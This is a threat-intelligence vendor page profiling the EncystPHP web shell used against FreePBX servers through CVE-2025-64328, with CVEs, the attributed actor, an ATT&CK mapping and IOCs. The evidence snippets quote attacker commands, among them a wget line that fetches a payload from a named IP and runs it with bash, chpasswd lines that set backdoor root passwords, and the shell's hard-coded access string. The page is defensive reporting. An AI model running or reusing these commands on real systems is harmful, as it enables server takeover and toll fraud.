Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
MalwareUsed by 1 actorExploits 3 CVEs

EncystPHP

EncystPHP is a PHP web shell targeting Sangoma FreePBX/Endpoint Manager environments. It has been observed since early December 2025 in campaigns exploiting CVE-2025-64328, a post-authentication command injection vulnerability in FreePBX, to gain execution as the asterisk user and deploy persistent web shells on internet-exposed VoIP/PBX servers. FortiGuard Labs named the malware EncystPHP and linked the activity to the financially motivated INJ3CTOR3 operation, which has a history of targeting VoIP infrastructure for toll fraud and related abuse.

High-confidence reported capabilities include remote command execution, persistence, and deployment of additional web shells/payloads. EncystPHP masquerades as legitimate FreePBX files, notably ajax.php, and in some reports presents an operator interface titled "Ask Master." It can enumerate the filesystem and processes, query active Asterisk channels, list SIP peers, and retrieve FreePBX and Elastix configuration files. Reported post-compromise actions include harvesting database configuration from /etc/freepbx.conf, creating a root-level local account named newfpbx with UID 0, resetting multiple account passwords, escalating privileges, injecting SSH public keys, modifying configuration to keep SSH port 22 open, deleting cron jobs and user accounts, removing competing web shells, deleting the Endpoint Manager module, restoring permissions to avoid service exceptions, and tampering with or deleting logs and temporary files for defense evasion.

Persistence is established through cron-based re-download and execution of additional droppers, including retrieval of k.php from 45.234.176.202 (crm.razatelefonia.pro). The malware and associated droppers were reported as Base64-encoded and decoded at runtime, with web shell copies placed across multiple web-accessible paths under the FreePBX web tree. Fortinet reported detections as PHP/EncystPHP.A!tr and BASH/EncystPHP.A!tr.

Observed indicators and infrastructure directly mentioned in reporting include 45.234.176.202, crm.razatelefonia.pro, hxxp://45.234.176.202/new/c, hxxp://45.234.176.202/new/k.php, and scanning/probing associated with 160.119.76.250. One observed web shell access pattern used a GET request to /admin/modules/phones/ajax.php with an md5 parameter containing the hard-coded string cf710203400b8c466e6dfcafcf36a411; reporting noted this value is compared as a string rather than validated as a true MD5 hash. EncystPHP has been widely reported in compromises of vulnerable FreePBX systems, with more than 900 infected FreePBX servers observed during the campaign wave.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

3 CVES
CVE-2025-64328OS Command Injection in Sangoma FreePBX Endpoint Manager Filestore ModuleExploited in the wild

A sophisticated attack campaign leveraging a critical FreePBX vulnerability to deploy a persistent webshell dubbed “EncystPHP,” enabling threat actors to gain complete administrative control over compromised VoIP systems.

via cyber security newscybersecuritynews.com
CVE-2021-45461RCE in FreePBX Rest Phone Apps (restapps)Exploited in the wild

As recently as last week, Fortinet revealed the threat actor behind the activity has weaponized CVE-2025-64328 starting early December 2025 to deliver a web shell codenamed EncystPHP. | In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461. These incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments.

via the hacker newsthehackernews.com
CVE-2019-19006Sangoma FreePBX Improper Authentication Vulnerability

FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment.

via fortinet threat researchfortinet.com
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
INJ3CTOR3

Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026.

via cyber security newscybersecuritynews.com
MITRE ATT&CK

Techniques & procedures

29 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1078Valid AccountsEvidence2

This version is also adding the following backdoor accounts...

T1190Exploit Public-Facing ApplicationEvidence5

"...exploits CVE-2025-64328, a post-authentication command-injection flaw in the FreePBX Endpoint Manager’s administrative interface... allows authenticated attackers to execute arbitrary shell commands as the asterisk user..."

Execution

4 techniques
T1053.003CronEvidence2

"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."

T1059Command and Scripting InterpreterEvidence2

By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges, enabling arbitrary command execution on the compromised host...

T1059.004Unix ShellEvidence4

Application: system data: wget http://45.95.147.178/k.php -O /tmp/k;bash /tmp/ k

T1203Exploitation for Client ExecutionEvidence1

The same IP address is also probing for various FreePBX vulnerabilities, for example: /restapps/applications.php?linestate=$$LINESTATE$$&user=100 ... Application: system data: wget http://45.95.147.178/k.php -O /tmp/k;bash /tmp/ k

Persistence

7 techniques
T1053.003CronEvidence2

"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."

T1078Valid AccountsEvidence2

This version is also adding the following backdoor accounts...

T1098Account ManipulationEvidence1

"...resets multiple user account passwords to a single value, and injects SSH public keys to maintain backdoor access."

T1098.004SSH Authorized KeysEvidence2

"...injects SSH public keys to maintain backdoor access."

T1136Create AccountEvidence2

This version is also adding the following backdoor accounts: echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e ... echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e

T1505.003Web ShellEvidence6

Today, I noticed some scans for what appears to be the "EncystPHP" web shell... It appears to be a favorite among attackers compromising vulnerable FreePBX systems.

T1556Modify Authentication ProcessEvidence1

"The webshell employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code."

Privilege Escalation

5 techniques
T1053.003CronEvidence2

"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."

T1068Exploitation for Privilege EscalationEvidence1

“By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges…”

T1078Valid AccountsEvidence2

This version is also adding the following backdoor accounts...

T1098Account ManipulationEvidence1

"...resets multiple user account passwords to a single value, and injects SSH public keys to maintain backdoor access."

T1098.004SSH Authorized KeysEvidence2

"...injects SSH public keys to maintain backdoor access."

Stealth

7 techniques
T1036MasqueradingEvidence1

"By mimicking legitimate FreePBX components, it attempts to 'evade immediate detection'"

T1036.005Match Legitimate Resource Name or LocationEvidence1

“written to disk, masquerading as a legitimate FreePBX file named ajax.php… [and] forges timestamps to match those of legitimate files”

T1070Indicator RemovalEvidence1

"EncystPHP also tampers with log files and disables error reporting to hinder forensic analysis and detection efforts."

T1070.002Clear Linux or Mac System LogsEvidence1

"...and sed to scrub logs."

T1070.004File DeletionEvidence1

"The malware also attempts to cover its tracks, executing commands like rm -rf /tmp/* to delete temporary files"

T1070.006TimestompEvidence1

"The malware forges timestamps to match legitimate files..."

T1078Valid AccountsEvidence2

This version is also adding the following backdoor accounts...

Defense Impairment

2 techniques
T1222File and Directory Permissions ModificationEvidence1

"Upon deployment, the malware modifies file permissions of legitimate FreePBX components to prevent detection..."

T1556Modify Authentication ProcessEvidence1

"The webshell employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code."

Credential Access

2 techniques
T1003OS Credential DumpingEvidence1

“attempts to collect database configuration information from /etc/freepbx.conf”

T1556Modify Authentication ProcessEvidence1

"The webshell employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code."

Discovery

4 techniques
T1057Process DiscoveryEvidence1

"...predefined operational commands for... process inspection..."

T1082System Information DiscoveryEvidence1

The web shell also exposes an interactive interface that supports several predefined operational commands. This includes file system enumeration, process inspection... and retrieving multiple FreePBX and Elastix configuration files.

T1083File and Directory DiscoveryEvidence1

"...predefined operational commands for file system enumeration... retrieving FreePBX and Elastix configuration files."

T1087Account DiscoveryEvidence1

The web shell also exposes an interactive interface that supports several predefined operational commands... listing Asterisk SIP peers...

Lateral Movement

1 technique
T1021.004SSHEvidence2

"...modifies system configurations to ensure SSH port 22 remains open... injects SSH public keys to maintain backdoor access."

Command and Control

2 techniques
T1071.001Web ProtocolsEvidence2

"...downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202..."

T1105Ingress Tool TransferEvidence3

"Fortinet observed that the attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202... redirected to another dropper named k.php."

Impact

1 technique
T1496Resource HijackingEvidence1

“enabling arbitrary command execution… and initiating outbound call activity through the PBX environment.”

Other

1 technique
T1562.001Disable or Modify ToolsEvidence1

“searches for PHP files associated with web shells… and deletes all matching files… [and] disables error reporting”

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
6 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
3 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
hash.md5●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
uri●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app4 months ago
ACTIVITY FEED

Recent activity

13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

cyber security newsNews
May 22, 2026
Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems

A prior campaign malware/dropper associated with the same FreePBX-focused toll fraud activity. The content references a January 2026 encystPHP campaign and its dropper as an earlier generation preceding JOMANGY.

Read more
handlers diary fullNews
Apr 13, 2026
Scans for EncystPHP Webshell - SANS Internet Storm Center

A web shell used by attackers compromising vulnerable FreePBX systems. It is accessed via a hard-coded string passed in the misleading "md5" parameter, and observed variants also add multiple backdoor accounts to the compromised host.

Read more
scworldNews
Mar 2, 2026
Hundreds of FreePBX instances infected by web shells exploiting command injection vulnerability | brief | SC Media

A web shell deployed onto vulnerable Sangoma FreePBX instances to enable remote command execution and persistent unauthorized access, reportedly running with elevated privileges.

Read more
security affairsNews
Mar 1, 2026
CVE-2025-64328 exploitation impacts 900 Sangoma FreePBX instances

A PHP web shell/dropper deployed after exploitation of CVE-2025-64328 in Sangoma FreePBX. Provides remote command execution and persistence, deploys additional web shells/payloads, performs system manipulation (e.g., locking key files, harvesting DB configs, deleting cron jobs and user accounts, removing rival web shells), establishes long-term access (creates root-level user, resets passwords, injects SSH key, keeps SSH/22 open), and conducts defense evasion (erases logs, restores permissions, removes the Endpoint Manager module).

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching14

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities3

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping29

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.